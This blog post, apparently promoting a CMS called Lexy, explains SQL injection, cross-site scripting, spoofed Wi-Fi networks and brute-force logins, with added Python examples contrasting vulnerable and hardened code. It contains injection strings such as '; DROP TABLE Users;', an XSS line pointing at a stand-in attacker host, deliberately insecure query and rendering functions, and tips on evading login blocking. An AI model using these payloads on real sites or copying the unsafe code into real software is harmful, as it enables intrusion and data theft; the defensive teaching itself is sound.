It surprises me to run into people who ask me if I can 'hack.' When I tell them 'uh... yeah, there are a lot of common exploits I know how to take advantage of' they look authentically impressed. They shouldn't be. The majority of web security exploits are less the product of brilliant hackers than they are the product of amateur developers. I'm so tired of arguing with people who think 'password' is a creative password or that blocking JavaScript is pointless. Just to illustrate how easily a developer can mess up a site so that any script-kiddy can violate its security, take a look at this guide. If you're brave enough to try any of these on a real site (and let me remind you that's illegal, and I in no way endorse it), the lack of security on the web to this day may terrify you more than Y2K, 2012, and global warming combined.
SQL injection sounds really technical, doesn't it? It can be, but for the most part an SQL injection simply means typing something very much like this "1 OR TRUE;" or this "; DROP TABLE Users;" into a web form and then submitting it. If those hacks work on a site, it is not because some cyber-genius had a Hollywood action scene where 'he blew right past the firewalls' or flew a hovercraft past some robots in a virtual reality; it's because the person who developed the code that talks to the database for that website was an idiot. No developer worth half his salt (most aren't) will ever use data that comes from places like a web address or a form that he hasn't sanitized. Sanitization can mean a lot of things. If a developer doesn't know what it means, they should learn before they ever write another word of computer code.
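To show exactly what "talks to the database" means when it goes wrong, here is an added example (my code, not anything from the original post): two versions of the same user lookup against a throwaway SQLite table, one that pastes the form value into the query text and one that passes it as a bound parameter. The table, its rows, and the lookup functions are all constructed for the demonstration; the injected value "1 OR 1=1" is the post's "1 OR TRUE" spelled in portable SQL.

```python
import sqlite3

# Added example, not code from the original post. A throwaway in-memory
# Users table stands in for a real site's database.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (id INTEGER PRIMARY KEY, name TEXT NOT NULL)")
    conn.executemany("INSERT INTO Users (name) VALUES (?)",
                     [("alice",), ("bob",), ("carol",)])
    conn.commit()
    return conn


def lookup_user_unsafe(conn, user_id):
    """Vulnerable: the value from the form or URL is pasted into the SQL text,
    so the database cannot tell where the query ends and the data begins."""
    query = "SELECT name FROM Users WHERE id = " + user_id + " ORDER BY id"
    return [row[0] for row in conn.execute(query)]


def lookup_user_safe(conn, user_id):
    """Hardened: the value travels as a bound parameter. Whatever it contains,
    the driver compares it against the id column and never parses it as SQL."""
    rows = conn.execute("SELECT name FROM Users WHERE id = ? ORDER BY id", (user_id,))
    return [row[0] for row in rows]


def users_table_exists(conn):
    """True while the Users table is still there (used to show the safe
    lookup leaves a 'DROP TABLE' payload inert)."""
    row = conn.execute(
        "SELECT COUNT(*) FROM sqlite_master WHERE type = 'table' AND name = 'Users'"
    ).fetchone()
    return row[0] == 1


if __name__ == "__main__":
    db = make_db()
    print(lookup_user_unsafe(db, "2"))          # ['bob']
    print(lookup_user_unsafe(db, "1 OR 1=1"))   # ['alice', 'bob', 'carol'] - every user leaks
    print(lookup_user_safe(db, "1 OR 1=1"))     # [] - the whole string is just a non-matching id
    print(lookup_user_safe(db, "1; DROP TABLE Users;"), users_table_exists(db))  # [] True
```

The vulnerable function returns every row the moment the input contains "OR 1=1", while the parameterised one returns nothing, because the database was handed a value, not a piece of query. Python's sqlite3 module refuses to run two statements in one execute() call, so the post's "; DROP TABLE Users;" is only shown here against the safe lookup, where it is harmless; many other database drivers will happily execute the second statement when it is concatenated into the query text.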
Cross site scripting most often refers to when some code exists on a site you visit that was never supposed to be there. This can be incredibly simple. Some morons will let third parties stream ads on their site without disabling any JavaScript. I've even once had an argument with a respected professional who thought that if code streamed from a third party in an iframe then the visitor was safe from any malicious JavaScript. In web security terms that's the equivalent of running naked through a minefield in broad daylight while wearing a blindfold, thinking that the blindfold will keep the machine gunners from seeing you since you can't see them.
It's not just ads that add a risk of cross site scripting, either. If a website wasn't made by a responsible adult, any form on the site could be a hole for a cross site scripting attack. Just add the line:
<div onload="http://www.haxors.com/animateComputerToMurderVisitor.js"></div> to a web form, where http://www.haxors.com/animateComputerToMurderVisitor.js is the location of computer code that any visitor viewing any page that displays the contents of that form field will then run on their local machine. If the developer is the twit of the year, this can even be accomplished without a form on the website, simply by sending the same text to the site the way you type an address into a web browser.
What are the wonderful things we can do with JavaScript? I could record everything you do on that web page, for one. I could also redirect you to a page that looks identical to the page you were on before, only my site prompts you for and saves some critical personal information. With a little work that the stupidest of script-kiddies could pull off with 5 minutes of Googling and some copying and pasting, someone could even steal your cookies and sessions for that page and change your password on you.
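The fix on the developer's side is output encoding: anything that came from a form field or the address bar is turned into HTML entities before it is written into the page, so the browser displays it as text instead of creating a tag from it. The following is an added example (mine, not code from the post) that renders the post's <div onload=...> line both ways, for the form-field case and for the "no form needed, just the address" case, and then uses Python's own HTML parser to list which tags a browser would actually build from each result. The comment-rendering functions, the search URL, and the tag collector are all constructed for the demonstration.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urlsplit, parse_qs, quote

# The line the post shows being pasted into a form, reused here as a
# constructed test input. No script is fetched or run by this example.
PAYLOAD = '<div onload="http://www.haxors.com/animateComputerToMurderVisitor.js"></div>'


def render_comment_unsafe(comment):
    """Vulnerable: the stored form value is dropped straight into the page."""
    return '<p class="comment">' + comment + '</p>'


def render_comment_safe(comment):
    """Hardened: every <, >, &, and quote becomes an entity, so the browser
    shows the text of the submission but never sees a tag in it."""
    return '<p class="comment">' + html.escape(comment, quote=True) + '</p>'


def search_url_for(term):
    """Build the 'type it in the address bar' variant: ?q=<term>, URL-encoded."""
    return "http://example.com/search?q=" + quote(term)


def render_search_safe(url):
    """Same rule for a value that arrived in the URL rather than a form."""
    term = parse_qs(urlsplit(url).query).get("q", [""])[0]
    return "<h1>Results for: " + html.escape(term, quote=True) + "</h1>"


class TagCollector(HTMLParser):
    """Records every start tag a browser would create from a fragment."""
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def tags_in(fragment):
    parser = TagCollector()
    parser.feed(fragment)
    parser.close()
    return parser.tags


if __name__ == "__main__":
    print(tags_in(render_comment_unsafe(PAYLOAD)))  # ['p', 'div']  the injected tag survives
    print(tags_in(render_comment_safe(PAYLOAD)))    # ['p']         only the site's own tag
    print(tags_in(render_search_safe(search_url_for(PAYLOAD))))  # ['h1']
```

The unsafe renderer hands the browser a second tag it never wrote; the escaped versions hand it the same characters as inert text. Escaping has to happen at the point of output, for every value, whether it was stored from a form weeks ago or arrived in the query string a millisecond ago.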
Ever checked your bank account on a public network? I'd advise you to never do so again. There are free programs you can download and run that will allow other users to connect to your computer so that they can access a network that you are connected to. You can call this network anything you want. Say you're connected to a network named Starbucks. You can broadcast a network named Starbucks 2. That sounds totally legit, right? People connect to Starbucks 2 (a slightly more advanced hacker could even attempt to force users on the other network to connect to his network) and you have hundreds of ways, including free programs you simply double click on, to record everything those users try to send on the internet.
Even if you haven't connected to a spoofed network, there are more ways for someone on the same network as you to see everything you get or send on the internet than I could possibly list in this article alone.
A brute force attack is simply a program that continuously guesses passwords until it gets one right. You advanced internet visitors probably think that's crazy, but after decades of hacker abuse many people still think 'password' is a creative password. Many brute force attacks are actually programmed to try the word 'password' first.
Some people think that you can simply block someone who tries to guess too many passwords, but things aren't that simple. Well-timed pauses, switches to other user names, or sending your guesses to the victim from several changing locations can bypass most attempts to blacklist addresses that are acting funny. Some login forms now require a Captcha (a question that computers have a hard time answering) after a few failed logins for a specific user, but a security measure that would probably surprise those who think of hacking as an art exclusive to geniuses is to require users to make a good password. If it isn't a dictionary word, it mixes upper and lower case, it has more than eight characters, and it contains at least one number, then it could take a brute force attack running on a supercomputer many years to solve. I know those things may be annoying if your password is 'hello1234', but if you don't already make passwords that complicated, even for sites that don't require it, I would strongly urge you to do so for the rest of your life.
I'm not trying to say that any site that can be hacked was made by an idiot, or that even truly brilliant individuals haven't made some silly mistakes or been plain old lazy. It's just that once you understand how these things are done, it's terrifying how easy it is. It's terrifying how often simple security measures aren't in place on sites that we visit, and how we can be exploited because of the idiocy or foolishness of the development community.
A simple and surprisingly effective way for a novice developer to avoid the pitfalls of stupid security is to reuse code from people who know what they're doing. If you're trying to get a website and anything in this blog was new to you, I'd strongly recommend you use a service like Lexy and let people with more experience handle your protection, along with the many other advantages of a content management system.
Hacking is an inevitability if someone is dedicated enough. The only truly good defense is professional developers and administrators who work full time to defend their websites and servers against hackers, and even then it's no picnic. If you truly want to be protected, you should give some serious thought to a solution like Lexy.